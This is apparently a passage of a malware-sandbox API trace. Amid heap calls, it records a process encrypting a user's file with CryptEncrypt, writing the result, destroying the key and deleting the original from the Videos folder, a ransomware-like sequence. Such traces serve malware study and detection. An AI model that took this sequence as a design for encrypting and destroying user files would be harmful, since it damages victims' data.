RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab5d8 [0214.770] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0214.770] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d08 [0214.770] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0214.770] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0214.770] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78318 | out: hHeap=0x2af0000) returned 1 [0214.770] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0214.770] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0214.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0214.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0214.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0214.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0214.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0214.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0214.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0214.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5f0 | out: hHeap=0x2af0000) returned 1 [0214.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0214.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0214.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0214.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0214.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5d8 | out: hHeap=0x2af0000) returned 1 [0214.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0214.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0214.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0214.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0214.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3b0 | out: hHeap=0x2af0000) returned 1 [0214.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0214.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0214.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0214.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0214.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0214.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5f0 | out: hHeap=0x2af0000) returned 1 [0214.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0214.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0214.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78070 | out: hHeap=0x2af0000) returned 1 [0214.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0214.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0214.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0214.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5f0 | out: hHeap=0x2af0000) returned 1 [0214.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab728 | out: hHeap=0x2af0000) returned 1 [0214.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0214.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0214.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0214.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0214.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab518 | out: hHeap=0x2af0000) returned 1 [0214.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6b0 | out: hHeap=0x2af0000) returned 1 [0214.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab608 | out: hHeap=0x2af0000) returned 1 [0214.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0214.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0214.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0214.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a90e28 | out: hHeap=0x2af0000) returned 1 [0214.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0214.773] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0214.773] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0214.773] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0214.773] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0214.773] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0214.773] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0214.773] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0214.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab728 | out: hHeap=0x2af0000) returned 1 [0214.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0214.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0214.774] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0214.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0214.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0214.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab728 | out: hHeap=0x2af0000) returned 1 [0214.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0214.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab728 | out: hHeap=0x2af0000) returned 1 [0214.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0214.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0214.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0214.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0214.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0214.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab518 | out: hHeap=0x2af0000) returned 1 [0214.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0214.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0214.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0214.774] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0214.775] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aab728, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0214.775] CryptEncrypt (in: hKey=0x9e21f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x366f, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x3670) returned 1 [0214.775] CharLowerBuffW (in: lpsz="byte[13936]", cchLength=0xb | out: lpsz="byte[13936]") returned 0xb [0214.775] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0214.775] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0214.775] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0214.775] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0214.776] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aab5c0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0214.776] CryptEncrypt (in: hKey=0x9e21f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2a90e28*, pdwDataLen=0x8cef60*=0x366f, dwBufLen=0x3670 | out: pbData=0x2a90e28*, pdwDataLen=0x8cef60*=0x3670) returned 1 [0214.776] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0214.776] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0214.776] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0214.776] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0214.776] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0214.776] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0214.778] WriteFile (in: hFile=0x510, lpBuffer=0x2a8a138*, nNumberOfBytesToWrite=0x3670, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2a8a138*, lpNumberOfBytesWritten=0x8cf5e4*=0x3670, lpOverlapped=0x0) returned 1 [0214.779] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0214.779] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0214.779] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0214.779] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0214.779] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0214.779] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0214.779] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aab638, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0214.779] CryptDestroyKey (hKey=0x9e21f8) returned 1 [0214.779] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0214.779] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0214.779] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0214.779] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0214.780] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0214.780] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0214.780] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0214.780] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0214.780] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0214.781] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0214.781] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0214.781] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0214.781] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0214.781] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0214.781] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0214.781] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0214.781] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0214.781] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0214.781] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f6e80, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0214.781] CryptReleaseContext (hProv=0xa7c440, dwFlags=0x0) returned 1 [0214.781] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0214.781] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0214.781] FreeLibrary (hLibModule=0x76390000) returned 1 [0214.781] CloseHandle (hObject=0x504) returned 1 [0214.782] CloseHandle (hObject=0x510) returned 1 [0214.784] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0214.784] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0214.784] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos/SuK1W_b3QKmuHjRF.swf", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\SuK1W_b3QKmuHjRF.swf", lpFilePart=0x8cedf4*="SuK1W_b3QKmuHjRF.swf") returned 0x2b [0214.784] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\SuK1W_b3QKmuHjRF.swf" (normalized: "c:\\users\\fd1hvy\\videos\\suk1w_b3qkmuhjrf.swf")) returned 0x20 [0214.784] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\SuK1W_b3QKmuHjRF.swf", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79739500, ftCreationTime.dwHighDateTime=0x1d5d350, ftLastAccessTime.dwLowDateTime=0xd8434120, ftLastAccessTime.dwHighDateTime=0x1d5d594, ftLastWriteTime.dwLowDateTime=0xd8434120, ftLastWriteTime.dwHighDateTime=0x1d5d594, nFileSizeHigh=0x0, nFileSizeLow=0x366f, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="SuK1W_b3QKmuHjRF.swf", cAlternateFileName="SUK1W_~1.SWF")) returned 0x9e2138 [0214.784] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\SuK1W_b3QKmuHjRF.swf" (normalized: "c:\\users\\fd1hvy\\videos\\suk1w_b3qkmuhjrf.swf")) returned 1 [0214.785] FindNextFileW (in: hFindFile=0x9e2138, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79739500, ftCreationTime.dwHighDateTime=0x1d5d350, ftLastAccessTime.dwLowDateTime=0xd8434120, ftLastAccessTime.dwHighDateTime=0x1d5d594, ftLastWriteTime.dwLowDateTime=0xd8434120, ftLastWriteTime.dwHighDateTime=0x1d5d594, nFileSizeHigh=0x0, nFileSizeLow=0x366f, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="SuK1W_b3QKmuHjRF.swf", cAlternateFileName="SUK1W_~1.SWF")) returned 0 [0214.785] FindClose (in: hFindFile=0x9e2138 | out: hFindFile=0x9e2138) returned 1 [0214.785] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74a50 | out: hHeap=0x2af0000) returned 1 [0214.785] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0214.785] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0214.785] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0214.785] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0214.785] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0214.785] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0214.785] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0214.785] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0214.785] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0214.785] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0214.785] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0214.785] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0214.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0214.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0214.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0214.786] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0214.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0214.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0214.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaae88 [0214.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0214.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0214.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaff0 [0214.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0214.786] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0214.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0214.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0214.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0214.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0214.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0214.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0214.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0214.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0214.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0214.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0214.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0214.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0214.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0214.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0214.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f60 [0214.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0214.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2a749e8 [0214.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0214.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0214.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0214.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0214.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0214.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0214.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0214.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0214.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f60 | out: hHeap=0x2af0000) returned 1 [0214.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0214.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0214.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0214.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0214.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0214.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0214.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0214.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0214.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0214.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0214.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0214.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0214.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0214.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x58) returned 0x2a5fc00 [0214.787] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos/SuK1W_b3QKmuHjRF.swf", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\SuK1W_b3QKmuHjRF.swf", lpFilePart=0x8cf650*="SuK1W_b3QKmuHjRF.swf") returned 0x2b [0214.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5fc00 | out: hHeap=0x2af0000) returned 1 